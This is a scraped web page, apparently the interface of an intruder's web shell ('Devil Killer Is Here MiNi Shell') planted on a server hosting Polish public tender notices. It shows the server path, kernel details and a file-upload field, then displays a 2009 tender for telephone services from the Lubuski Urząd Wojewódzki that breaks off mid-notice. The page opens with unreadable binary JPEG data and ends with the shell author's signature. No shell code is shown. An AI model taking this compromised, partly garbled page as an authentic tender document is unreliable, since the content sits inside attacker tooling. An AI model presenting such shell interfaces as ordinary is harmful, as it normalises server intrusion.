JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090114/15123-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usług telekomunikacyjnych w sieci telefonii stacjonarnej dla potrzeb Lubuskiego Urzędu Wojewódzkiego  oraz Urzędu Skarbowego w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 15123 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubuski Urząd Wojewódzki , ul Jagiellończyka 8, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7215285, faks 095 7224188, 7115401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wojewodalubuski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych w sieci telefonii stacjonarnej dla potrzeb Lubuskiego Urzędu Wojewódzkiego  oraz Urzędu Skarbowego w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
a) świadczenie usług telekomunikacyjnych w sieci telefonii stacjonarnej dla potrzeb Lubuskiego Urzędu Wojewódzkiego w Gorzowie Wlkp. oraz Urzędu Skarbowego 
w Gorzowie Wlkp., potwierdzanej comiesięcznymi bilingami, w zakresie 
DDI 095 7115000 - 095 7115999,
b) dostarczenie i uruchomienie centrali telefonicznej, 
c) dostarczenie programu do zarządzania centralą telefoniczną, programu taryfikacyjnego oraz 1 bezprzewodowego mobilnego modemu wraz z aktywną kartą SIM dla administratora systemu,
d) dostarczenie 55 cyfrowych systemowych aparatów telefonicznych, 2 systemowych aparatów telefonicznych do obsługi stanowiska AWIZO oraz 20 bezprzewodowych aparatów telefonicznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 64.21.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 2. Informacje dotyczące warunków wymaganych od Wykonawców. 
2.1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy: 

2.1.1. są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami PZP, 

2.1.2. posiadają uprawnienia niezbędne do wykonania prac będących przedmiotem zamówienia, 

2.1.3. posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,

2.1.4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 

2.1.5. nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP, 

2.1.6. załączą dokumenty wymagane w pkt 3 rozdziału III,

2.1.7. spełniają wymagania określone w Specyfikacji Istotnych Warunków Zamówienia.

2.2. W okresie ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali min. 2 zadania, z których każde polega na świadczeniu usługi telekomunikacyjnej w sieci telefonii stacjonarnej i dostawie centrali telefonicznej o wartości łącznej min. 200.000,00 zł brutto (wartość usługi + wartość centrali). 

2.3. Zadania wykazane w pkt 2.2. wykonali należycie.

2.4. Są wpisani do rejestru przedsiębiorców telekomunikacyjnych. 

2.5. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych oświadczeń i dokumentów, według zasady: spełnia- nie spełnia. 

4. Kryteria oceny ofert i zasady ich oceny. 
4.1. Przy wyborze najkorzystniejszej oferty, Zamawiający upoważniony będzie się kierował następującym kryterium: 
Cena - 100 % 
4.1.1. Opis sposobu oceniania oferty:
Cena - 100%
Wyliczenie matematyczne wg wzoru:


A (x) = 	Cmin	X 100
	C (x)	

gdzie: 
A(x) - ilość punktów przyznana ofercie (x) za kryterium ceny, 
Cmin - cena najniższa wśród cen zawartych w ofertach na zadania objęte przetargiem, 
C(x) - cena zawarta w ofercie badanej (x)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3. Wymagane dokumenty. 
3.1. Wypełniony formularz oferty (wg wzoru załącznika nr 1 do SIWZ).

3.2. Dokumenty zgodne z art. 26 ust. 2 PZP i wyszczególnione w § 1 ust. 1 pkt. 1, 2, 3, 4 i 5, ust. 2 
pkt 2, 3 i 3a rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy (Dz. U. Nr 87, poz. 605 z późn.zmianami) tj.: 
a) aktualne zaświadczenie o dokonaniu zgłoszenia działalności telekomunikacyjnej zgodnie z art. 224 ustawy z dnia 16 lipca 2004 r. - Prawo telekomunikacyjne lub zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych, o których mowa w przepisach tej ustawy, 
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
c) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu w postępowaniu o udzielenie zamówienia albo składania ofert, 
d) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
e) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

3.2.1. W przypadku podmiotów występujących wspólnie o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania lub reprezentowania i podpisania umowy zgodnie z art. 23 ustawy PZP. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokument wymieniony w pkt 3.2 ppkt a-e winien dołączyć każdy podmiot występujący wspólnie. 
3.2.2 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 3.2, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie, 
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
3.2.3. Dokumenty, o których mowa w pkt 3.2.2  lit. a, b - wystawione nie wcześniej niż 6 miesięcy, 
a lit. c - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, winny zostać złożone w formie oryginału, odpisu, wypisu, wyciągu lub kopii przetłumaczone na język polski i zawierające poświadczenia zgodnie z konwencją haską z 1961r. 
W przypadku, gdy Wykonawca pochodzi z państwa, które nie podpisało konwencji haskiej dokumenty, o których mowa w pkt 3.2.2. winien złożyć w formie oryginału, odpisu, wypisu, wyciągu lub kopii przetłumaczone na język polski i zawierające poświadczenia przez polskie placówki konsularne, stosownie do obowiązujących przepisów. 

3.3.  Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 PZP oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy - zgodnie z formularzem stanowiącym załącznik nr 2 do SIWZ. 

3.4.   Formularz cenowy (załącznik nr 3 do SIWZ). 

3.5.  Wykaz wykonanych w okresie ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, zamówień, wg wzoru określonego    w załączniku nr 4 do SIWZ Doświadczenie zawodowe, potwierdzający warunek zapisany 
w pkt 2.2  Instrukcji dla Wykonawcy.

3.5.1. Dokumenty (referencje) od poprzednich zamawiających potwierdzające, że wykazane zamówienia w załączniku nr 4 do SIWZ, zostały wykonane należycie. 

3.6. Wykaz urządzeń specjalistycznych niezbędnych do wykonania zamówienia (załącznik nr 5 do 
      SIWZ)

3.7. Dowód wpłaty wadium, w przypadku wpłaty pieniężnej przelewem potwierdzenie wpłaty - dokument np. odcinek ostemplowany przez bank, potwierdzający wpłatę środków finansowych na konto Zamawiającego upoważnionego, w przypadku pozostałych form wniesienia wadium oryginał dokumentu należy złożyć w kasie LUW w Gorzowie Wlkp. ul. Jagiellończyka 8 (pokój nr 832) zaś do oferty dołączyć kopie dokumentu. Jeśli Wykonawca prześle ofertę pocztą winien kopie dowodu wniesienia wadium załączyć do oferty, natomiast oryginał umieścić w oznaczonej kopercie (oryginał dowodu wniesienia wadium). 

3.8. Istotne postanowienia umowy - załącznik nr 6 , 7 do SIWZ. 

3.9. Wykonawca nie znający języka polskiego zobowiązany jest na czas realizacji przedmiotu zamówienia do zatrudnienia na własny koszt tłumacza.

3.10. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski sporządzonym przez tłumacza przysięgłego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.luw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubuski Urząd Wojewódzki
66-400 Gorzów Wlkp., ul. Jagiellończyka 8,pokój nr 712 (sekretariat Wydziału Organizacyjno-Administracyjnego).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2009 godzina 11:00, miejsce: Lubuski Urząd Wojewódzki
66-400 Gorzów Wlkp., ul. Jagiellończyka 8,pokój nr 712 (sekretariat Wydziału Organizacyjno-Administracyjnego).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ewentualne warunki zmiany postanowień umowy zostały przewidziane i opisane

Creat By MiNi SheLL
Email: jattceo@gmail.com